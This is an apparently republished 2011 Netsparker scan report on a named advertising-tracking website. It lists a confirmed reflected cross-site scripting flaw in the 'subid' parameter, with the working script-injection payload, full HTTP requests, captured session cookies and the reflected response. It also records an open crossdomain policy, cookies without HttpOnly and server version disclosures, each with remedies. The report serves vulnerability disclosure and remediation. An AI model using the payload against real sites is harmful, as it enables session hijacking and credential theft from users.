XSS, Cross Site Scripting in gnspf.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

Netsparker - Scan Report Summary
TARGET URL
http://gnspf.com/offerwall/index.php?oo=7690&...
SCAN DATE
5/3/2011 1:06:47 AM
REPORT DATE
5/3/2011 1:30:35 AM
SCAN DURATION
00:01:18

Total Requests

Average Speed

req/sec.
9
identified
4
confirmed
0
critical
2
informational

DORK TESTS

DORK TESTS
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
11 %
MEDIUM
11 %
LOW
56 %
INFORMATION
22 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/ E-mail Address Disclosure No
/click/ Cookie Not Marked As HttpOnly Yes
Apache Version Disclosure No
/crossdomain.xml Open Policy Crossdomain.xml Identified Yes
/images/6740-230740-300x250.jpg PHP Version Disclosure No
OpenSSL Version Disclosure No
Apache Module Version Disclosure No
/offerwall/css/ Forbidden Resource Yes
/offerwall/index.php subid GET Cross-site Scripting Yes
Cross-site Scripting

Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /offerwall/index.php

/offerwall/index.php CONFIRMED

http://gnspf.com/offerwall/index.php?oo=7690&subid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
oo GET 7690
subid GET '"--></style></script><script>alert(0x0000EA)</script>
nbCode GET OjU6NDg6MTY6VISfQZXfKk1xPQp1F3d6U474F0kd9DXO_aRRfiNjFxz0DshmL1zP0wk3UyUDQF7t9c8QogydX9svo6GLQiyQPA

Request

GET /offerwall/index.php?oo=7690&subid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000EA)%3C/script%3E&nbCode=OjU6NDg6MTY6VISfQZXfKk1xPQp1F3d6U474F0kd9DXO_aRRfiNjFxz0DshmL1zP0wk3UyUDQF7t9c8QogydX9svo6GLQiyQPA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: gnspf.com
Cookie: BIGipServertracking-pool=16912556.20480.0000; confirm=5144595; 6740=InSiyZkfoMCzkX7YBVgAWg%3D%3D%7C%2BZG%2FA9zjqeV7XMMugu%2BFFu%2F3XQvlHBX5keNmmggSLFLNbCNUk%2BBuyYnjGKSYS0n24ZmLp39KkyYxnPOenDP1KHsT8pppdy6RDdrs2Ksgih325QquTPpSOPLff23HjRwg7fRsmbD5wRJ4wQn%2FT7nMZw%3D%3D; 6740-ses=81piljG04LjbUODyQAuRKQ%3D%3D%7CzENOVNT40i8YMq%2BsGumybu%2BgYq7ZhUedC9Z6NLiMqt4%3D; 8067=aHApF9DwmhL6h%2FlgFnm1GA%3D%3D%7CLGDeu6aLK7GaRwYeTr5fbI2BkZB4CeApZ3X2FNTLhzKSGYF9saKvjYnCE5DNFvCzYbzFLus6cybxxJ%2BF8yE0BqkJ7sg7NZpOZwU6%2BE%2B3lg5dCG3PD0MjZYLpwPE%2Bc1rRzKDEE1AWeofWhZQLbPOV3OHFoDabkWwtuCaR%2FdZbCdyimXPUFp769Wqt%2BdsSp%2Fkn; 8067-ses=c5HTGAnbOSTDMp7h06KRkg%3D%3D%7C5fKz086zwcGhUEvgnVPKb0j%2BZEIyQugYq%2FpfIFU50ik%3D; PHPSESSID=0220e4dbb5e27334e64eca1ba56498d6; 3617=5RjJaF58OrBVGYa3KK%2Fe%2FA%3D%3D%7CM2GOlhPPRA4oWH1A4uyd8B6zTQH%2B%2F2Ml82vhZqZJqBWZ%2FtYmh0qFimfg8mY%2F8RBlsho6ljLjRc%2FOJY11AwErlCycb5wM5RpyV7NAWEGeLAG05cBsm7cQmU8eq2lAgrkMkq6s3CCaZqnl1V1Y0%2FuVNg6ve2vudQzx4OPlwlrs4To%3D; 3617-ses=wLP1vYOjS3LQDGosLoOUCw%3D%3D%7CZdAU%2BmLdslVP%2BXHLMn51FEfzEwFNdpZDP%2BYdfZmgLww%3D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 01:07:04 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Content-Length: 1880
Keep-Alive: timeout=2, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Please choose an offer that is available in your area.</title> <meta http-equiv="content-type" content="text/html;charset=UTF-8" /> <meta name="description" content="The offer you have clicked on is not available in your area. Here are some other offers you may be interested in." /> <link href="http://gnspf.com/offerwall/css/layout.css" rel="stylesheet" type="text/css" /><link href="http://gnspf.com/offerwall/css/lp1.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="sitecontainer"> <div id="header"> <h1> We're sorry, that offer is not available in your area. You may be interested in one of the offers below: </h1> </div> <div id="content" class="clearfix"> <div class="offerwall clearfix"> <ul class="offers"><li> <a href="http://jrtux.com/click/?s=33520&c=150634&subid='"--></style></script><script>netsparker(0x0000EA)</script>"> <img src="http://jrtux.com/images/3078-150634-300x250.gif?s=33520" alt="" border="0" /></a></li><li> <a href="http://tutvp.com/click/?s=33520&c=172538&subid='"--></style></script><script>netsparker(0x0000EA)</script>"> <img src="http://tutvp.com/images/5614-172538-300x250.gif?s=33520" alt="" border="0" /></a></li><li> <a href="http://gnspf.com/click/?s=33520&c=325897&subid='"--></style></script><script>netsparker(0x0000EA)</script>"> <img src="http://gnspf.com/images/3617-325897-301x251.jpg?s=33520" alt="" border="0" /></a></li><li> <a href="http://gnspf.com/click/?s=33520&c=230740&subid='"--></style></script><script>netsparker(0x0000EA)</script>"> <img src="http://gnspf.com/images/6740-230740-300x250.jpg?s=33520" alt="" border="0" /></a></li></ul> </div> </div></div> </body></html>
Open Policy Crossdomain.xml Identified

Open Policy Crossdomain.xml Identified

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified Open Policy Crossdomain.xml file.

Impact

Open Policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions.

Remedy

Configure your Crossdomain.xml to prevent access from everywhere to your domain.

External References

- /crossdomain.xml

/crossdomain.xml CONFIRMED

http://gnspf.com/crossdomain.xml

Policy Rules

Request

GET /crossdomain.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: gnspf.com
Cookie: BIGipServertracking-pool=17371308.20480.0000; confirm=4396154
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 01:06:48 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17
Last-Modified: Fri, 26 Nov 2010 17:43:31 GMT
ETag: "20e0006-d1-42bdb6c0"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: application/xml


<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" secure="false"/></cross-domain-policy>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /click/

/click/ CONFIRMED

http://gnspf.com/click/?s=1&c=325897&subid=

Identified Cookie

3617

Request

GET /click/?s=1&c=325897&subid= HTTP/1.1
Referer: http://gnspf.com/offerwall/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: gnspf.com
Cookie: BIGipServertracking-pool=17371308.20480.0000; confirm=4396154
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 01:06:48 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 01:06:48 GMT
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DEVa TAIa OUR BUS"
Set-Cookie: 3617=yRxDLFwoRstQyRWRTBIUyA%3D%3D%7C2LG1it8xrFj6XaB4NfaEZVgdEnFSxVrOi4koJGZEU1aLsbYJLlhPTamvb9W9%2BG4e%2FLdDZwBWTSABwgi7kjVu5HVjBH2q9KwcY6lUUMDGOQO%2BGwpqr4tRrstLzyQbjgR2gIE1AfCPUFRIrQwhOb7Et9D7zrQ9tuVIVMmFq%2B3aT3o%3D; expires=Wed, 02-May-2012 01:06:48 GMT; path=/,3617-ses=srU0Cc92p3RHdeap0eqYhQ%3D%3D%7Ckgamk4Pgss850kMopLMVYcuMHtMOThHmVzeNqxyL0%2FA%3D; path=/
Location: http://tracking.singlesnet.com/redirect/9754?sid=1&site=1&code=OjU6NDg6MTY6n9oYHOPdYQf0AscDH8SZb3L0Kp3E4RxgneidNv0zPL6svWZagTicY_SgXW3puCDIGkCEkAiWmxXWuZATZ8Fazw
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /click/

/click/

http://gnspf.com/click/?s=1&c=325897&subid=

Extracted Version

2.0.64 (Unix)

Request

GET /click/?s=1&c=325897&subid= HTTP/1.1
Referer: http://gnspf.com/offerwall/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: gnspf.com
Cookie: BIGipServertracking-pool=17371308.20480.0000; confirm=4396154
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 01:06:48 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 01:06:48 GMT
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DEVa TAIa OUR BUS"
Set-Cookie: 3617=yRxDLFwoRstQyRWRTBIUyA%3D%3D%7C2LG1it8xrFj6XaB4NfaEZVgdEnFSxVrOi4koJGZEU1aLsbYJLlhPTamvb9W9%2BG4e%2FLdDZwBWTSABwgi7kjVu5HVjBH2q9KwcY6lUUMDGOQO%2BGwpqr4tRrstLzyQbjgR2gIE1AfCPUFRIrQwhOb7Et9D7zrQ9tuVIVMmFq%2B3aT3o%3D; expires=Wed, 02-May-2012 01:06:48 GMT; path=/,3617-ses=srU0Cc92p3RHdeap0eqYhQ%3D%3D%7Ckgamk4Pgss850kMopLMVYcuMHtMOThHmVzeNqxyL0%2FA%3D; path=/
Location: http://tracking.singlesnet.com/redirect/9754?sid=1&site=1&code=OjU6NDg6MTY6n9oYHOPdYQf0AscDH8SZb3L0Kp3E4RxgneidNv0zPL6svWZagTicY_SgXW3puCDIGkCEkAiWmxXWuZATZ8Fazw
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /images/6740-230740-300x250.jpg

/images/6740-230740-300x250.jpg

http://gnspf.com/images/6740-230740-300x250.jpg?s=1

Extracted Version

PHP/5.2.17

Request

GET /images/6740-230740-300x250.jpg?s=1 HTTP/1.1
Referer: http://gnspf.com/offerwall/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: gnspf.com
Cookie: BIGipServertracking-pool=17371308.20480.0000; confirm=4396154
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 01:06:48 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Location: http://mirror.nbstatic.com/images/6740-230740-300x250.jpg
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


OpenSSL Version Disclosure

OpenSSL Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.

Impact

An attacker can look for specific security vulnerabilities for the identified version. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /images/6740-230740-300x250.jpg

/images/6740-230740-300x250.jpg

http://gnspf.com/images/6740-230740-300x250.jpg?s=1

Extracted Version

OpenSSL/0.9.8e-fips-rhel5

Request

GET /images/6740-230740-300x250.jpg?s=1 HTTP/1.1
Referer: http://gnspf.com/offerwall/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: gnspf.com
Cookie: BIGipServertracking-pool=17371308.20480.0000; confirm=4396154
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 01:06:48 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Location: http://mirror.nbstatic.com/images/6740-230740-300x250.jpg
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


Apache Module Version Disclosure

Apache Module Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /images/6740-230740-300x250.jpg

/images/6740-230740-300x250.jpg

http://gnspf.com/images/6740-230740-300x250.jpg?s=1

Extracted Version

mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17

Request

GET /images/6740-230740-300x250.jpg?s=1 HTTP/1.1
Referer: http://gnspf.com/offerwall/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: gnspf.com
Cookie: BIGipServertracking-pool=17371308.20480.0000; confirm=4396154
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 01:06:48 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Location: http://mirror.nbstatic.com/images/6740-230740-300x250.jpg
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /offerwall/css/

/offerwall/css/ CONFIRMED

http://gnspf.com/offerwall/css/

Request

GET /offerwall/css/ HTTP/1.1
Referer: http://gnspf.com/offerwall/css/layout.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: gnspf.com
Cookie: BIGipServertracking-pool=17371308.20480.0000; confirm=4396154
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 01:06:48 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17
Content-Length: 341
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /offerwall/css/on this server.</p><hr><address>Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17 Server at gnspf.com Port 80</address></body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /

/

http://gnspf.com/

Found E-mails

abuse@neverblue.com

Request

GET / HTTP/1.1
Referer: http://gnspf.com/offerwall/index.php?oo=7690&subid=&nbCode=OjU6NDg6MTY6VISfQZXfKk1xPQp1F3d6U474F0kd9DXO_aRRfiNjFxz0DshmL1zP0wk3UyUDQF7t9c8QogydX9svo6GLQiyQPA
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: gnspf.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 01:06:47 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Set-Cookie: confirm=4396154,BIGipServertracking-pool=16912556.20480.0000; path=/
Content-Length: 4959
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <title>GNSPF.COM</title> <meta http-equiv="content-type" content="text/html;charset=ISO-8859-1" /> <style type="text/css"> html{ overflow: -moz-scrollbars-vertical !important; } html, body, table, tr, td, div, p, span, input, select, .container, textarea{ font-family: arial, helvetica, sans-serif; } body{ padding: 0; margin:0; font-size: 14px; background: url(img/global-background.gif) #505050; } form{ display: inline; } div.main { width: 620px; margin: auto; padding: 0; background-color: white; border-left: 1px solid #000; border-right: 1px solid #000; border-bottom: 1px solid #000; } div.logo{ background: url(img/neverblue-satellite-logo.gif) no-repeat #FFFFFF center center; width:220px; height: 31px; } div.top{ padding: 8px 8px 8px 8px; } div.sections{ margin: 15px 30px 15px 30px; } div.hr{ background: url(img/neverblueads-traffic.jpg) #CCC top left; height: 26px; font-size: 1px; } span.h1 { font-size: 20px; letter-spacing: -0.04em; font-weight: bold; white-space: none; } span.h2 { font-size: 16px; letter-spacing: -0.04em; font-weight: bold; } span.field{ font-weight: bold; } td.info { font-size: 12px; font-style: italic; } td.submit { text-align: right; } td.submit input { margin-left: auto; } a{ color: #002d62; } </style></head><body><div class="main"> <div class="top"> <table cellspacing="0" cellpadding="0"> <tr> <td><div class="logo"></div></td> <td style="width: 100%"></td> <td><span class="h1">GNSPF.COM</span></td> </tr> </table> </div> <div class="hr"></div> <div class="sections"> <span class="h2">What is GNSPF.COM?</span><br> &nbsp;&nbsp;&nbsp;&nbsp;GNSPF.COM is a technology used to track online advertising campaigns for our partners. It is owned by Neverblue, an affiliate network.<br> <br> <span class="h2">Who is Neverblue?</span><br> &nbsp;&nbsp;&nbsp;&nbsp;Based in beautiful Victoria, British Columbia, Neverblue is a premier global lead generation network that delivers millions of profitable customers to clients from all over the world, including members of the Fortune 1000.<br> <br> <span class="h2">How did I get here?</span><br> &nbsp;&nbsp;&nbsp;&nbsp;If you did not intend to come to this page, an online advertisement may have been setup incorrectly.<br> We apologize for any inconvenience.<br> <br> <span class="h2">Email Marketing</span><br> <a href="http://www.lashback.com"><img src="http://www.lashback.com/images/v6/CANSPAMComplianceSeal.gif" width="135" height="50" border="0" align="right"></a> &nbsp;&nbsp;&nbsp;&nbsp;You may have found this website from an email advertisement. Although Neverblue is a partner of the party that sent you the email, Neverblue does not participate in email marketing. Neverblue is not held liable for any email practices conducted by its partners. Neverblue Media and its affiliates are <b>CAN-SPAM</b> compliant. If you would like to read more about this please <a href="http://www.ftc.gov/bcp/edu/pubs/business/ecommerce/bus61.shtm">Click Here</a>.<br> &nbsp;&nbsp;&nbsp;&nbsp;If you received an unsolicited email advertisement, there should be a way of unsubscribing from the mailing list at the bottom of the email. Please note that unsubscribing from an email list can take a number of days to take effect. If you received an email advertisement and there is no way to unsubscribe, please forward it to <a href="mailto:abuse@neverblue.com">abuse@neverblue.com</a> immediately for investigation.<br> <br> <span class="h2">Contact Us</span><br> Please contact Neverblue if you have any questions or concerns.<br> <table cellsacing="0"> <form method="post" action="nbcontactus.php"> <input type="hidden" name="confirm" value="8f67885c8674176d43c14c627cb61596"> <tr> <td><span class="field">Subject:</span></td> <td colspan="2"><input type="text" name="subject" value="" style="width: 440px;"></td> </tr> <tr> <td><span class="field">Message:</span></td> <td colspan="2"><textarea name="message" rows="5" style="width: 440px;"></textarea></td> </tr> <tr> <td></td> <td class="info" colspan="2">If you wish to be contacted, include your email address.</td> </tr> <tr> <td><span class="field">Security code:</span></td> <td class="emailelement"> <input name="captcha" id="captcha" value="" size="40" type="text"> </td> <td class="hint"> <img src="/captcha.php?width=110&amp;height=40&amp;characters=5"> </td> </tr> <tr> <td></td> <td class="submit"><input type="submit" value="Contact Us!"></td> </tr> </form> </table> </div></div></body></html>